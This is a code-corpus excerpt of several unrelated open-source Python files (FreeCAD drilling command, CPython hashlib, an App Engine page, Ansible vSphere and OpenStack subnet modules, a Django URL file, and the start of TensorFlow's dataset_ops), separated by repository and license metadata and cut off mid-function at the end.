path = Path.Path(output)
obj.Path = path
# tie the toolnumber to the PathLoadTool object ToolNumber
if len(obj.InList)>0: #check to see if obj is in the Project group yet
project = obj.InList[0]
tl = int(PathUtils.changeTool(obj,project))
obj.ToolNumber= tl
class _ViewProviderDrill:
def __init__(self,obj): #mandatory
# obj.addProperty("App::PropertyFloat","SomePropertyName","PropertyGroup","Description of this property")
obj.Proxy = self
def __getstate__(self): #mandatory
return None
def __setstate__(self,state): #mandatory
return None
def getIcon(self): #optional
return ":/icons/Path-Drilling.svg"
# def attach(self): #optional
# # this is executed on object creation and object load from file
# pass
def onChanged(self,obj,prop): #optional
# this is executed when a property of the VIEW PROVIDER changes
pass
def updateData(self,obj,prop): #optional
# this is executed when a property of the APP OBJECT changes
pass
def setEdit(self,vobj,mode): #optional
# this is executed when the object is double-clicked in the tree
pass
def unsetEdit(self,vobj,mode): #optional
# this is executed when the user cancels or terminates edit mode
pass
class CommandPathDrilling:
def GetResources(self):
return {'Pixmap' : 'Path-Drilling',
'MenuText': QtCore.QT_TRANSLATE_NOOP("PathDrilling","Drilling"),
'Accel': "P, D",
'ToolTip': QtCore.QT_TRANSLATE_NOOP("PathDrilling","Creates a Path Drilling object")}
def IsActive(self):
return not FreeCAD.ActiveDocument is None
def Activated(self):
import Path
import Part
from PathScripts import PathUtils,PathDrilling,PathProject
prjexists = False
selection = FreeCADGui.Selection.getSelectionEx()
if not selection:
return
# if everything is ok, execute and register the transaction in the undo/redo stack
FreeCAD.ActiveDocument.openTransaction(translate("PathDrilling","Create Drilling"))
FreeCADGui.addModule("PathScripts.PathDrilling")
obj = FreeCAD.ActiveDocument.addObject("Path::FeaturePython","Drilling")
PathDrilling.ObjectDrilling(obj)
myList = obj.locations
for sub in selection:
for point in sub.SubObjects:
if isinstance(point,Part.Vertex):
myList.append(FreeCAD.Vector(point.X, point.Y, point.Z))
if isinstance(point,Part.Edge):
if isinstance(point.Curve,Part.Circle):
center = point.Curve.Center
myList.append(FreeCAD.Vector(center.x,center.y,center.z))
obj.locations = myList
PathDrilling._ViewProviderDrill(obj.ViewObject)
# obj.ViewObject.Proxy = 0
obj.Active = True
project = PathUtils.addToProject(obj)
tl = PathUtils.changeTool(obj,project)
if tl:
obj.ToolNumber = tl
FreeCAD.ActiveDocument.commitTransaction()
FreeCAD.ActiveDocument.recompute()
if FreeCAD.GuiUp:
# register the FreeCAD command
FreeCADGui.addCommand('Path_Drilling',CommandPathDrilling())
FreeCAD.Console.PrintLog("Loading PathDrilling... done\n")
| lgpl-2.1 |
antb/TPT----My-old-mod | src/python/stdlib/hashlib.py | 12 | 4893 | # $Id: hashlib.py 78528 2010-03-01 02:01:47Z gregory.p.smith $
#
# Copyright (C) 2005 Gregory P. Smith (greg@krypto.org)
# Licensed to PSF under a Contributor Agreement.
#
__doc__ = """hashlib module - A common interface to many hash functions.
new(name, string='') - returns a new hash object implementing the
given hash function; initializing the hash
using the given string data.
Named constructor functions are also available, these are much faster
than using new():
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
More algorithms may be available on your platform but the above are
guaranteed to exist.
NOTE: If you want the adler32 or crc32 hash functions they are available in
the zlib module.
Choose your hash function wisely. Some have known collision weaknesses.
sha384 and sha512 will be slow on 32 bit platforms.
Hash objects have these methods:
- update(arg): Update the hash object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- copy(): Return a copy (clone) of the hash object. This can be used to
efficiently compute the digests of strings that share a common
initial substring.
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import hashlib
>>> m = hashlib.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
'\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9'
More condensed:
>>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest()
'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2'
"""
# This tuple and __get_builtin_constructor() must be modified if a new
# always available algorithm is added.
__always_supported = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')
algorithms = __always_supported
__all__ = __always_supported + ('new', 'algorithms')
def __get_builtin_constructor(name):
if name in ('SHA1', 'sha1'):
import _sha
return _sha.new
elif name in ('MD5', 'md5'):
import _md5
return _md5.new
elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'):
import _sha256
bs = name[3:]
if bs == '256':
return _sha256.sha256
elif bs == '224':
return _sha256.sha224
elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'):
import _sha512
bs = name[3:]
if bs == '512':
return _sha512.sha512
elif bs == '384':
return _sha512.sha384
raise ValueError('unsupported hash type %s' % name)
def __get_openssl_constructor(name):
try:
f = getattr(_hashlib, 'openssl_' + name)
# Allow the C module to raise ValueError. The function will be
# defined but the hash not actually available thanks to OpenSSL.
f()
# Use the C function directly (very fast)
return f
except (AttributeError, ValueError):
return __get_builtin_constructor(name)
def __py_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
return __get_builtin_constructor(name)(string)
def __hash_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
try:
return _hashlib.new(name, string)
except ValueError:
# If the _hashlib module (OpenSSL) doesn't support the named
# hash, try using our builtin implementations.
# This allows for SHA224/256 and SHA384/512 support even though
# the OpenSSL library prior to 0.9.8 doesn't provide them.
return __get_builtin_constructor(name)(string)
try:
import _hashlib
new = __hash_new
__get_hash = __get_openssl_constructor
except ImportError:
new = __py_new
__get_hash = __get_builtin_constructor
for __func_name in __always_supported:
# try them all, some may not work due to the OpenSSL
# version not supporting that algorithm.
try:
globals()[__func_name] = __get_hash(__func_name)
except ValueError:
import logging
logging.exception('code for hash %s was not found.', __func_name)
# Cleanup locals()
del __always_supported, __func_name, __get_hash
del __py_new, __hash_new, __get_openssl_constructor
| gpl-2.0 |
puruckertom/poptox | poptox/yulefurry/yulefurry_qaqc.py | 1 | 1396 | import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import numpy as np
import cgi
import cgitb
cgitb.enable()
class yulefurryQaqcPage(webapp.RequestHandler):
def get(self):
templatepath = os.path.dirname(__file__) + '/../templates/'
html = template.render(templatepath + '01pop_uberheader.html', 'title')
html = html + template.render(templatepath + '02pop_uberintroblock_wmodellinks.html', {'model':'yulefurry','page':'qaqc'})
html = html + template.render (templatepath + '03pop_ubertext_links_left.html', {})
html = html + template.render(templatepath + '04uberinput_start.html', {
'model':'yulefurry',
'model_attributes':'Yule-Furry Markov Process QAQC'})
# html = html =
html = html + template.render(templatepath + '04uberinput_end.html', {'sub_title': ''})
html = html + template.render(templatepath + '05pop_ubertext_links_right.html', {})
html = html + template.render(templatepath + '06pop_uberfooter.html', {'links': ''})
self.response.out.write(html)
app = webapp.WSGIApplication([('/.*', yulefurryQaqcPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
| unlicense |
aerickson/ansible | lib/ansible/modules/cloud/vmware/vsphere_copy.py | 36 | 6516 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Dag Wieers <dag@wieers.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vsphere_copy
short_description: Copy a file to a vCenter datastore
description:
- Upload files to a vCenter datastore
version_added: 2.0
author: Dag Wieers (@dagwieers) <dag@wieers.com>
options:
host:
description:
- The vCenter server on which the datastore is available.
required: true
login:
description:
- The login name to authenticate on the vCenter server.
required: true
password:
description:
- The password to authenticate on the vCenter server.
required: true
src:
description:
- The file to push to vCenter
required: true
datacenter:
description:
- The datacenter on the vCenter server that holds the datastore.
required: true
datastore:
description:
- The datastore on the vCenter server to push files to.
required: true
path:
description:
- The file to push to the datastore on the vCenter server.
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists.
required: false
default: 'yes'
choices: ['yes', 'no']
notes:
- "This module ought to be run from a system that can access vCenter directly and has the file to transfer.
It can be the normal remote target or you can change it either by using C(transport: local) or using C(delegate_to)."
- Tested on vSphere 5.5
'''
EXAMPLES = '''
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /some/local/file
datacenter: DC1 Someplace
datastore: datastore1
path: some/remote/file
transport: local
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /other/local/file
datacenter: DC2 Someplace
datastore: datastore2
path: other/remote/file
delegate_to: other_system
'''
import atexit
import urllib
import mmap
import errno
import socket
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.urls import open_url
def vmware_path(datastore, datacenter, path):
''' Constructs a URL path that VSphere accepts reliably '''
path = "/folder/%s" % path.lstrip("/")
# Due to a software bug in vSphere, it fails to handle ampersand in datacenter names
# The solution is to do what vSphere does (when browsing) and double-encode ampersands, maybe others ?
datacenter = datacenter.replace('&', '%26')
if not path.startswith("/"):
path = "/" + path
params = dict( dsName = datastore )
if datacenter:
params["dcPath"] = datacenter
params = urllib.urlencode(params)
return "%s?%s" % (path, params)
def main():
module = AnsibleModule(
argument_spec = dict(
host = dict(required=True, aliases=[ 'hostname' ]),
login = dict(required=True, aliases=[ 'username' ]),
password = dict(required=True, no_log=True),
src = dict(required=True, aliases=[ 'name' ]),
datacenter = dict(required=True),
datastore = dict(required=True),
dest = dict(required=True, aliases=[ 'path' ]),
validate_certs = dict(required=False, default=True, type='bool'),
),
# Implementing check-mode using HEAD is impossible, since size/date is not 100% reliable
supports_check_mode = False,
)
host = module.params.get('host')
login = module.params.get('login')
password = module.params.get('password')
src = module.params.get('src')
datacenter = module.params.get('datacenter')
datastore = module.params.get('datastore')
dest = module.params.get('dest')
validate_certs = module.params.get('validate_certs')
fd = open(src, "rb")
atexit.register(fd.close)
data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)
atexit.register(data.close)
remote_path = vmware_path(datastore, datacenter, dest)
url = 'https://%s%s' % (host, remote_path)
headers = {
"Content-Type": "application/octet-stream",
"Content-Length": str(len(data)),
}
try:
r = open_url(url, data=data, headers=headers, method='PUT',
url_username=login, url_password=password, validate_certs=validate_certs,
force_basic_auth=True)
except socket.error:
e = get_exception()
if isinstance(e.args, tuple) and e[0] == errno.ECONNRESET:
# VSphere resets connection if the file is in use and cannot be replaced
module.fail_json(msg='Failed to upload, image probably in use', status=None, errno=e[0], reason=str(e), url=url)
else:
module.fail_json(msg=str(e), status=None, errno=e[0], reason=str(e), url=url)
except Exception:
e = get_exception()
error_code = -1
try:
if isinstance(e[0], int):
error_code = e[0]
except KeyError:
pass
module.fail_json(msg=str(e), status=None, errno=error_code, reason=str(e), url=url)
status = r.getcode()
if 200 <= status < 300:
module.exit_json(changed=True, status=status, reason=r.msg, url=url)
else:
length = r.headers.get('content-length', None)
if r.headers.get('transfer-encoding', '').lower() == 'chunked':
chunked = 1
else:
chunked = 0
module.fail_json(msg='Failed to upload', errno=None, status=status, reason=r.msg, length=length, headers=dict(r.headers), chunked=chunked, url=url)
if __name__ == '__main__':
main()
| gpl-3.0 |
skg-net/ansible | lib/ansible/modules/cloud/openstack/os_subnet.py | 27 | 12816 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2013, Benno Joy <benno@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_subnet
short_description: Add/Remove subnet to an OpenStack network
extends_documentation_fragment: openstack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
description:
- Add or Remove a subnet to an OpenStack network
options:
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
network_name:
description:
- Name of the network to which the subnet should be attached
- Required when I(state) is 'present'
name:
description:
- The name of the subnet that should be created. Although Neutron
allows for non-unique subnet names, this module enforces subnet
name uniqueness.
required: true
cidr:
description:
- The CIDR representation of the subnet that should be assigned to
the subnet. Required when I(state) is 'present' and a subnetpool
is not specified.
ip_version:
description:
- The IP version of the subnet 4 or 6
default: 4
enable_dhcp:
description:
- Whether DHCP should be enabled for this subnet.
type: bool
default: 'yes'
gateway_ip:
description:
- The ip that would be assigned to the gateway for this subnet
no_gateway_ip:
description:
- The gateway IP would not be assigned for this subnet
type: bool
default: 'no'
version_added: "2.2"
dns_nameservers:
description:
- List of DNS nameservers for this subnet.
allocation_pool_start:
description:
- From the subnet pool the starting address from which the IP should
be allocated.
allocation_pool_end:
description:
- From the subnet pool the last IP that should be assigned to the
virtual machines.
host_routes:
description:
- A list of host route dictionaries for the subnet.
ipv6_ra_mode:
description:
- IPv6 router advertisement mode
choices: ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
ipv6_address_mode:
description:
- IPv6 address mode
choices: ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
use_default_subnetpool:
description:
- Use the default subnetpool for I(ip_version) to obtain a CIDR.
type: bool
default: 'no'
project:
description:
- Project name or ID containing the subnet (name admin-only)
version_added: "2.1"
availability_zone:
description:
- Ignored. Present for backwards compatibility
extra_specs:
description:
- Dictionary with extra key/value pairs passed to the API
required: false
default: {}
version_added: "2.7"
requirements:
- "python >= 2.7"
- "openstacksdk"
'''
EXAMPLES = '''
# Create a new (or update an existing) subnet on the specified network
- os_subnet:
state: present
network_name: network1
name: net1subnet
cidr: 192.168.0.0/24
dns_nameservers:
- 8.8.8.7
- 8.8.8.8
host_routes:
- destination: 0.0.0.0/0
nexthop: 12.34.56.78
- destination: 192.168.0.0/24
nexthop: 192.168.0.1
# Delete a subnet
- os_subnet:
state: absent
name: net1subnet
# Create an ipv6 stateless subnet
- os_subnet:
state: present
name: intv6
network_name: internal
ip_version: 6
cidr: 2db8:1::/64
dns_nameservers:
- 2001:4860:4860::8888
- 2001:4860:4860::8844
ipv6_ra_mode: dhcpv6-stateless
ipv6_address_mode: dhcpv6-stateless
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _can_update(subnet, module, cloud):
"""Check for differences in non-updatable values"""
network_name = module.params['network_name']
ip_version = int(module.params['ip_version'])
ipv6_ra_mode = module.params['ipv6_ra_mode']
ipv6_a_mode = module.params['ipv6_address_mode']
if network_name:
network = cloud.get_network(network_name)
if network:
netid = network['id']
else:
module.fail_json(msg='No network found for %s' % network_name)
if netid != subnet['network_id']:
module.fail_json(msg='Cannot update network_name in existing \
subnet')
if ip_version and subnet['ip_version'] != ip_version:
module.fail_json(msg='Cannot update ip_version in existing subnet')
if ipv6_ra_mode and subnet.get('ipv6_ra_mode', None) != ipv6_ra_mode:
module.fail_json(msg='Cannot update ipv6_ra_mode in existing subnet')
if ipv6_a_mode and subnet.get('ipv6_address_mode', None) != ipv6_a_mode:
module.fail_json(msg='Cannot update ipv6_address_mode in existing \
subnet')
def _needs_update(subnet, module, cloud):
"""Check for differences in the updatable values."""
# First check if we are trying to update something we're not allowed to
_can_update(subnet, module, cloud)
# now check for the things we are allowed to update
enable_dhcp = module.params['enable_dhcp']
subnet_name = module.params['name']
pool_start = module.params['allocation_pool_start']
pool_end = module.params['allocation_pool_end']
gateway_ip = module.params['gateway_ip']
no_gateway_ip = module.params['no_gateway_ip']
dns = module.params['dns_nameservers']
host_routes = module.params['host_routes']
curr_pool = subnet['allocation_pools'][0]
if subnet['enable_dhcp'] != enable_dhcp:
return True
if subnet_name and subnet['name'] != subnet_name:
return True
if pool_start and curr_pool['start'] != pool_start:
return True
if pool_end and curr_pool['end'] != pool_end:
return True
if gateway_ip and subnet['gateway_ip'] != gateway_ip:
return True
if dns and sorted(subnet['dns_nameservers']) != sorted(dns):
return True
if host_routes:
curr_hr = sorted(subnet['host_routes'], key=lambda t: t.keys())
new_hr = sorted(host_routes, key=lambda t: t.keys())
if sorted(curr_hr) != sorted(new_hr):
return True
if no_gateway_ip and subnet['gateway_ip']:
return True
return False
def _system_state_change(module, subnet, cloud):
state = module.params['state']
if state == 'present':
if not subnet:
return True
return _needs_update(subnet, module, cloud)
if state == 'absent' and subnet:
return True
return False
def main():
ipv6_mode_choices = ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
argument_spec = openstack_full_argument_spec(
name=dict(required=True),
network_name=dict(default=None),
cidr=dict(default=None),
ip_version=dict(default='4', choices=['4', '6']),
enable_dhcp=dict(default='true', type='bool'),
gateway_ip=dict(default=None),
no_gateway_ip=dict(default=False, type='bool'),
dns_nameservers=dict(default=None, type='list'),
allocation_pool_start=dict(default=None),
allocation_pool_end=dict(default=None),
host_routes=dict(default=None, type='list'),
ipv6_ra_mode=dict(default=None, choice=ipv6_mode_choices),
ipv6_address_mode=dict(default=None, choice=ipv6_mode_choices),
use_default_subnetpool=dict(default=False, type='bool'),
extra_specs=dict(required=False, default=dict(), type='dict'),
state=dict(default='present', choices=['absent', 'present']),
project=dict(default=None)
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
state = module.params['state']
network_name = module.params['network_name']
cidr = module.params['cidr']
ip_version = module.params['ip_version']
enable_dhcp = module.params['enable_dhcp']
subnet_name = module.params['name']
gateway_ip = module.params['gateway_ip']
no_gateway_ip = module.params['no_gateway_ip']
dns = module.params['dns_nameservers']
pool_start = module.params['allocation_pool_start']
pool_end = module.params['allocation_pool_end']
host_routes = module.params['host_routes']
ipv6_ra_mode = module.params['ipv6_ra_mode']
ipv6_a_mode = module.params['ipv6_address_mode']
use_default_subnetpool = module.params['use_default_subnetpool']
project = module.params.pop('project')
extra_specs = module.params['extra_specs']
# Check for required parameters when state == 'present'
if state == 'present':
if not module.params['network_name']:
module.fail_json(msg='network_name required with present state')
if not module.params['cidr'] and not use_default_subnetpool:
module.fail_json(msg='cidr or use_default_subnetpool required '
'with present state')
if pool_start and pool_end:
pool = [dict(start=pool_start, end=pool_end)]
elif pool_start or pool_end:
module.fail_json(msg='allocation pool requires start and end values')
else:
pool = None
if no_gateway_ip and gateway_ip:
module.fail_json(msg='no_gateway_ip is not allowed with gateway_ip')
sdk, cloud = openstack_cloud_from_module(module)
try:
if project is not None:
proj = cloud.get_project(project)
if proj is None:
module.fail_json(msg='Project %s could not be found' % project)
project_id = proj['id']
filters = {'tenant_id': project_id}
else:
project_id = None
filters = None
subnet = cloud.get_subnet(subnet_name, filters=filters)
if module.check_mode:
module.exit_json(changed=_system_state_change(module, subnet,
cloud))
if state == 'present':
if not subnet:
kwargs = dict(
cidr=cidr,
ip_version=ip_version,
enable_dhcp=enable_dhcp,
subnet_name=subnet_name,
gateway_ip=gateway_ip,
disable_gateway_ip=no_gateway_ip,
dns_nameservers=dns,
allocation_pools=pool,
host_routes=host_routes,
ipv6_ra_mode=ipv6_ra_mode,
ipv6_address_mode=ipv6_a_mode,
tenant_id=project_id)
dup_args = set(kwargs.keys()) & set(extra_specs.keys())
if dup_args:
raise ValueError('Duplicate key(s) {0} in extra_specs'
.format(list(dup_args)))
if use_default_subnetpool:
kwargs['use_default_subnetpool'] = use_default_subnetpool
kwargs = dict(kwargs, **extra_specs)
subnet = cloud.create_subnet(network_name, **kwargs)
changed = True
else:
if _needs_update(subnet, module, cloud):
cloud.update_subnet(subnet['id'],
subnet_name=subnet_name,
enable_dhcp=enable_dhcp,
gateway_ip=gateway_ip,
disable_gateway_ip=no_gateway_ip,
dns_nameservers=dns,
allocation_pools=pool,
host_routes=host_routes)
changed = True
else:
changed = False
module.exit_json(changed=changed,
subnet=subnet,
id=subnet['id'])
elif state == 'absent':
if not subnet:
changed = False
else:
changed = True
cloud.delete_subnet(subnet_name)
module.exit_json(changed=changed)
except sdk.exceptions.OpenStackCloudException as e:
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 |
gnowgi/gnowsys-studio | objectapp/urls/search.py | 2 | 3476 | # Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This project incorporates work covered by the following copyright and permission notice:
# Copyright (c) 2009, Julien Fache
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the author nor the names of other
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Urls for the Objectapp search"""
from django.conf.urls.defaults import url
from django.conf.urls.defaults import patterns
urlpatterns = patterns('objectapp.views.search',
url(r'^$', 'nodes_search', name='nodes_search'),
)
| agpl-3.0 |
horance-liu/tensorflow | tensorflow/python/data/ops/dataset_ops.py | 2 | 60412 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for Datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import threading
import numpy as np
import six
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import sparse
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor as sparse_tensor_lib
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import gen_dataset_ops
from tensorflow.python.ops import gen_io_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
class Dataset(object):
"""Represents a potentially large set of elements.
A `Dataset` can be used to represent an input pipeline as a
collection of elements (nested structures of tensors) and a "logical
plan" of transformations that act on those elements.
"""
__metaclass__ = abc.ABCMeta
def __init__(self):
pass
@abc.abstractmethod
def _as_variant_tensor(self):
"""Creates a scalar `tf.Tensor` of `tf.variant` representing this dataset.
Returns:
A scalar `tf.Tensor` of `tf.variant` type, which represents this dataset.
"""
raise NotImplementedError("Dataset._as_variant_tensor")
def make_initializable_iterator(self, shared_name=None):
"""Creates an `Iterator` for enumerating the elements of this dataset.
Note: The returned iterator will be in an uninitialized state,
and you must run the `iterator.initializer` operation before using it:
```python
dataset = ...
iterator = dataset.make_initializable_iterator()
# ...
sess.run(iterator.initializer)
```
Args:
shared_name: (Optional.) If non-empty, the returned iterator will be
shared under the given name across multiple sessions that share the
same devices (e.g. when using a remote server).
Returns:
An `Iterator` over the elements of this dataset.
Raises:
RuntimeError: If eager execution is enabled.
"""
if context.in_eager_mode():
raise RuntimeError(
"dataset.make_initializable_iterator is not supported when eager "
"execution is enabled.")
if shared_name is None:
shared_name = ""
iterator_resource = gen_dataset_ops.iterator(
container="",
shared_name=shared_name,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
with ops.colocate_with(iterator_resource):
initializer = gen_dataset_ops.make_iterator(self._as_variant_tensor(),
iterator_resource)
return iterator_ops.Iterator(iterator_resource, initializer,
self.output_types, self.output_shapes)
def make_one_shot_iterator(self):
"""Creates an `Iterator` for enumerating the elements of this dataset.
Note: The returned iterator will be initialized automatically.
A "one-shot" iterator does not currently support re-initialization.
Returns:
An `Iterator` over the elements of this dataset.
Raises:
RuntimeError: If eager execution is enabled.
"""
if context.in_eager_mode():
raise RuntimeError(
"dataset.make_one_shot_iterator is not supported when eager "
"execution is enabled.")
# NOTE(mrry): We capture by value here to ensure that `_make_dataset()` is
# a 0-argument function.
@function.Defun(capture_by_value=True)
def _make_dataset():
return self._as_variant_tensor() # pylint: disable=protected-access
try:
_make_dataset.add_to_graph(ops.get_default_graph())
except ValueError as err:
if "Cannot capture a stateful node" in str(err):
raise ValueError(
"Failed to create a one-shot iterator for a dataset. "
"`Dataset.make_one_shot_iterator()` does not support datasets that "
"capture stateful objects, such as a `Variable` or `LookupTable`. "
"In these cases, use `Dataset.make_initializable_iterator()`. "
"(Original error: %s)" % err)
else:
six.reraise(ValueError, err)
return iterator_ops.Iterator(
gen_dataset_ops.one_shot_iterator(
dataset_factory=_make_dataset,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes)), None,
self.output_types, self.output_shapes)
@abc.abstractproperty
def output_shapes(self):
"""Returns the shape of each component of an element of this dataset.
Returns:
A nested structure of `tf.TensorShape` objects corresponding to each
component of an element of this dataset.
"""
raise NotImplementedError("Dataset.output_shapes")
@abc.abstractproperty
def output_types(self):
"""Returns the type of each component of an element of this dataset.
Returns:
A nested structure of `tf.DType` (or `tf.data.SparseType`) objects
corresponding to each `tf.Tensor` (or `tf.SparseTensor`) component of an
element of this dataset.
"""
raise NotImplementedError("Dataset.output_types")
def __repr__(self):
output_shapes = nest.map_structure(str, self.output_shapes)
output_shapes = str(output_shapes).replace("'", "")
output_types = nest.map_structure(repr, self.output_types)
output_types = str(output_types).replace("'", "")
return ("<%s shapes: %s, types: %s>" % (type(self).__name__, output_shapes,
output_types))
@staticmethod
def from_tensors(tensors):
"""Creates a `Dataset` with a single element, comprising the given tensors.
Args:
tensors: A nested structure of tensors.
Returns:
A `Dataset`.
"""
return TensorDataset(tensors)
@staticmethod
def from_tensor_slices(tensors):
"""Creates a `Dataset` whose elements are slices of the given tensors.
Args:
tensors: A nested structure of tensors, each having the same size in the
0th dimension.
Returns:
A `Dataset`.
"""
return TensorSliceDataset(tensors)
@staticmethod
def from_sparse_tensor_slices(sparse_tensor):
"""Splits each rank-N `tf.SparseTensor` in this dataset row-wise.
Args:
sparse_tensor: A `tf.SparseTensor`.
Returns:
A `Dataset` of rank-(N-1) sparse tensors.
"""
return SparseTensorSliceDataset(sparse_tensor)
class _GeneratorState(object):
"""Stores outstanding iterators created from a Python generator.
This class keeps track of potentially multiple iterators that may have
been created from a generator, e.g. in the case that the dataset is
repeated, or nested within a parallel computation.
"""
def __init__(self, generator):
self._generator = generator
self._lock = threading.Lock()
self._next_id = 0 # GUARDED_BY(self._lock)
self._iterators = collections.defaultdict(lambda: iter(generator()))
def get_next_id(self):
with self._lock:
ret = self._next_id
self._next_id += 1
# NOTE(mrry): Explicitly create an array of `np.int64` because implicit
# casting in `py_func()` will create an array of `np.int32` on Windows,
# leading to a runtime error.
return np.array(ret, dtype=np.int64)
def get_iterator(self, iterator_id):
return self._iterators[iterator_id]
def iterator_completed(self, iterator_id):
